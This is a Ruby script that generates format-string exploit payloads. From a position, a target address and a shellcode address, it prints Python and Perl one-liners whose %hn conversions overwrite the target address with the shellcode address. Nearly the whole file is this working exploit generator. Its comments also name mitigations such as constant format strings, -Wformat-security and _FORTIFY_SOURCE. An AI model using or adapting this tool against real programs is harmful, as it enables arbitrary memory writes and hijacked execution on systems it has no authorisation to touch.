#!/usr/bin/env ruby
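# Validate the command-line argument; print a usage line and exit when it is
# missing or malformed.
#
# The accepted shape is "<position>:<target_address>:<shellcode_address>": a
# decimal position followed by two 0x-prefixed addresses of exactly eight hex
# digits. The script later slices both addresses at fixed offsets, so a shorter
# or longer address would be silently mis-parsed instead of rejected.
#
# @param fmt [String, nil] raw first command-line argument
# @return [nil] when fmt is well formed; otherwise the process exits
def check_param(fmt)
  # \A and \z anchor the whole string. ^ and $ match per line, so they would
  # accept a valid-looking line embedded in a multi-line argument or followed
  # by a trailing newline.
  return if fmt.to_s.match?(/\A\d+:0x\h{8}:0x\h{8}\z/)

  puts "syntax: #{$0} <position:target_address:shellcode_address>"
  exit
end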
# Script body: reads one argument of the form
# position:target_address:shellcode_address and prints a Python and a Perl
# one-liner that each emit the same format string.
#
# The emitted string only does anything when a program passes caller-supplied
# data as the format argument of a printf-family call. The usual mitigations
# are constant format strings (printf("%s", buf)), -Wformat-security at build
# time, and _FORTIFY_SOURCE, under which glibc rejects %n in writable memory.
fmt = ARGV[0]
check_param(fmt) # exits with a usage line when the argument is unusable
position, target_field, shellcode_field = fmt.split(":")

# Skip the "0x" prefix, then take the upper and lower four hex digits of the
# shellcode address as two 16-bit values.
high_half = shellcode_field[2, 4].to_i(16)
low_half = shellcode_field[6, 4].to_i(16)
target_hex = target_field[2, 8]
arg_index = Integer(position)
next_index = arg_index + 1

# The second half-word lives two bytes past the target address.
target_plus_two = "%08x" % (target_hex.to_i(16) + 2)

# The smaller half is written first, so the running output count only has to
# grow between the two %hn conversions. 8 is subtracted from the first width,
# presumably for the eight address bytes emitted ahead of the conversions.
if high_half > low_half
  first_pad = low_half - 8
  second_pad = high_half - low_half
  addresses = [target_hex, target_plus_two]
else
  first_pad = high_half - 8
  second_pad = low_half - high_half
  addresses = [target_plus_two, target_hex]
end

# Render each address as \x-escaped bytes in reversed (little-endian) order.
first_addr, second_addr = addresses.map do |hex|
  "\\x" + hex.scan(/../).reverse.join("\\x")
end

puts "python -c 'print \"#{first_addr}\"+\"#{second_addr}\"+\"%#{arg_index}$#{first_pad}x%#{arg_index}$hn%#{next_index}$#{second_pad}x%#{next_index}$hn\"'"
puts "perl -e 'print \"#{first_addr}\".\"#{second_addr}\".\"%#{arg_index}\\$#{first_pad}x%#{arg_index}\\$hn%#{next_index}\\$#{second_pad}x%#{next_index}\\$hn\"'"